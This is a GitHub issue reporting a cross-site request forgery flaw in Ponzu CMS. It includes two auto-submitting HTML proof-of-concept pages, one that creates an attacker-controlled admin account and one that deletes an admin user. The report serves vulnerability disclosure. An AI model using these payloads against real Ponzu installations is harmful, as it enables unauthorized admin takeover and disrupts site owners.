search

ponzu-cms / ponzu

Headless CMS with automatic JSON API. Featuring auto-HTTPS from Let's Encrypt, HTTP/2 Server Push, and flexible server framework written in Go.
https://docs.ponzu-cms.org
BSD 3-Clause "New" or "Revised" License
5.67k stars 387 forks source link

Cross-Site Request Forgery in Ponzu CMS. #338

Open Loginsoft-Research opened 4 years ago

Loginsoft-Research commented 4 years ago

Vulnerability Description :- The Ponzu CMS is vulnerable to CSRF. Application allows an attacker to create an admin user and delete an user in ponzu CMS. An attacker can exploit this vulnerability by crafting a malicious page and perform further actions after successful exploitation.

Step To Reproduce :-

To create an admin account <html> <body> <form action="http://target.com/admin/configure/users" method="POST" enctype="multipart/form-data"> <input type="hidden" name="email" value="newadmin@evildomain.com" /> <input type="hidden" name="password" value="newadminpassword" /> </form> <script>document.forms[0].submit();</script> </body> </html

To delete an admin account <html> <body> <form action="http://target.com/admin/configure/users/delete" method="POST" enctype="multipart/form-data"> <input type="hidden" name="email" value="admin@example.com" /> <input type="hidden" name="id" value="1" /> </form> <script>document.forms[0].submit();</script> </body> </html>